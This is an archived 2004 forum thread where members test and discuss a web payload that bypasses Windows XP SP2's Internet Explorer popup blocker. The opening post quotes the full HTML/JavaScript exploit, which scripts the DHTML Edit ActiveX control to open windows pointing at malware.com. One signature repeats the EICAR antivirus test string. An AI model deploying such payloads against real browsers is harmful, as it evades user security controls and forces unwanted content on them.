• Welcome to Valhalla Legends Archive.
 

Defeating XP SP2 Popup Blocker

Started by iago, December 10, 2004, 03:06 PM

Previous topic - Next topic
Print
|
Go Down Pages1
User actions

iago

December 10, 2004, 03:06 PM
http://www.malware.com/flopup.html

Can somebody confirm that that works to block SP2's popup blocker? I don't have an SP2 machine handy to test it on.  The code for it is:

Code Select
<body onload="setTimeout('   main()   ',1000)">
<object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>

<SCRIPT>

// 10.11.04 http://www.editive.com

function shellscript()
{
open("http://www.malware.com/flywin.html","_blank","scrollbar=no");
showModalDialog("http://www.malware.com/flywin.html");
}

function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
}
</SCRIPT>
<br><br><br><br><br><br><center><img src=nocigar.gif><br><br><FONT FACE=ARIAL SIZE 12PT>NO CIGAR !</FONT></center>
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

dxoigmn

#1
December 10, 2004, 03:39 PM
Works here, that code bypasses the popup blocker.

MyndFyre

#2
December 11, 2004, 10:53 PM
That's because it doesn't actually use popups (the popup blocker blocks window.open() in Javascript).  That COM class is "DHTML Edit Control Safe for Scripting for IE5" so I'm not sure what he did in the web page dialog object, but it sucks.  Wonderful to have.
QuoteEvery generation of humans believed it had all the answers it needed, except for a few mysteries they assumed would be solved at any moment. And they all believed their ancestors were simplistic and deluded. What are the odds that you are the first generation of humans who will understand reality?

After 3 years, it's on the horizon.  The new JinxBot, and BN#, the managed Battle.net Client library.

Quote from: chyea on January 16, 2009, 05:05 PM
You've just located global warming.

iago

#3
December 12, 2004, 12:03 AM
In any case, it never showed up with Firefox.  So I win :)
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

hismajesty

#4
December 12, 2004, 05:55 PM
when I went to that page with IE it wanted me to install frontpage!

quasi-modo

#5
December 13, 2004, 03:38 PM
Popups are becoming less of a problem. Nowadays I am browsing with javascript turned off altogether because of annoying divs with ads in them sliding across my screen, etc.
WAR EAGLE!
Quote(00:04:08) zdv17: yeah i quit doing that stuff cause it jacked up the power bill too much
(00:04:19) nick is a turtle: Right now im not paying the power bill though
(00:04:33) nick is a turtle: if i had to pay the electric bill
(00:04:47) nick is a turtle: id hibernate when i go to class
(00:04:57) nick is a turtle: or at least when i go to sleep
(00:08:50) zdv17: hibernating in class is cool.. esp. when you leave a drool puddle

MyndFyre

#6
December 13, 2004, 04:53 PM
At work:

Quote
Access Denied (content_filter_denied)


Your request was denied because of its content categorization: "Hacking;Information Technology" 


For assistance, contact your network support team. 
QuoteEvery generation of humans believed it had all the answers it needed, except for a few mysteries they assumed would be solved at any moment. And they all believed their ancestors were simplistic and deluded. What are the odds that you are the first generation of humans who will understand reality?

After 3 years, it's on the horizon.  The new JinxBot, and BN#, the managed Battle.net Client library.

Quote from: chyea on January 16, 2009, 05:05 PM
You've just located global warming.

iago

#7
December 13, 2004, 06:05 PM
Well, it IS malware.com.  At the moment, we don't have content filters at work, but we should.
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Spht

#8
December 24, 2005, 09:31 AM
*yawn* It was no match for me, iago.

http://www.valhallalegends.com/spht/no_cigar.gif

Get a REAL browser!

Maddox

#9
December 27, 2005, 12:49 AM
McAfee detected an "IE-exploit."
asdf.
Print
|
Go Up Pages1
User actions